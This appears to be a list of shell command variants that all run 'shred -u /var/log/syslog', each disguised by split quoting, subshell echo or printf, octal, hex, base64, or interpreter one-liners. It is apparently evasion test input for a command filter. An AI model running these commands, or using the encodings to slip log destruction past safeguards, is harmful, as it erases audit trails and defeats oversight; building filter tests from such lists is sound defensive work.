shred -u /var/"log"/syslog
shred -u /"var"/log/syslog
shred -u "/var"/log/syslog
shred -u /var/log/"syslog"
shred -u /var/log/sys"log"
shred -u /va"r"/log/syslog
shred -u /var/lo"g"/syslog
sh"red" -u /var/log/syslog
"shred" -u /var/log/syslog
shred -u /var/log/sy"sl"og
shred -u /var/l"og"/syslog
shred -u /v"ar"/log/syslog
sh"re""d" -u /var/log/syslog
s"hr"ed -u /var/log/syslog
shre"d" -u "/var/log/syslog"
shred -u "/var"/"log"/"syslog"
sh""red -u /var/log/syslog
shred -u /var/lo""g/syslog
shred -u /va""r/log/syslog
shred -u /var/log/sy""slog
shred -u "/var"/"log"/"syslog"
"sh""red" -u /var/log/syslog
s"hr""ed" -u /var/log/syslog
shred -u /"var"/"log"/sys"log"
shred -u "/var"/log/"syslog"
shred -u $(echo '/var/log/syslog')
shred -u $(echo -n '/var/log/syslog')
shred -u $(echo '/var'/'log'/'syslog')
shred -u $(eval echo /var/log/syslog)
shred -u "$(printf '/%s/%s/%s' var log syslog)"
shred -u $(echo /var/log/$(basename /var/log/syslog))
shred -u $(readlink -f /var/../var/log/syslog)
shred -u $(python3 -c "print('/var/log/' + 'syslog')")
shred -u $(perl -e "print '/var/log/syslog'")
shred -u $(printf '\057\166\141\162\057\154\157\147\057\163\171\163\154\157\147')
shred -u $(awk 'BEGIN{printf "/var/log/syslog"}')
shred -u $(perl -e 'print "/var/log/syslog"')
shred -u $(printf '/%s/%s/%s' var log syslog)
shred -u $(echo 2f7661722f6c6f672f7379736c6f67 | xxd -r -p)
shred -u $(echo L3Zhci9sb2cvc3lzbG9n | base64 -d)
shred -u $(echo $((0x2f766172)) | sed 's/.*/\/var\/log\/syslog/')
shred -u $(printf '/var/%s/%s' log syslog)
shred -u $(echo /var/log/syslog | iconv -f utf-8 -t utf-8)
shred -u $(printf '%s' "$(echo /var/log/syslog)")
shred -u $(echo /var/log/syslog | awk '{print}')
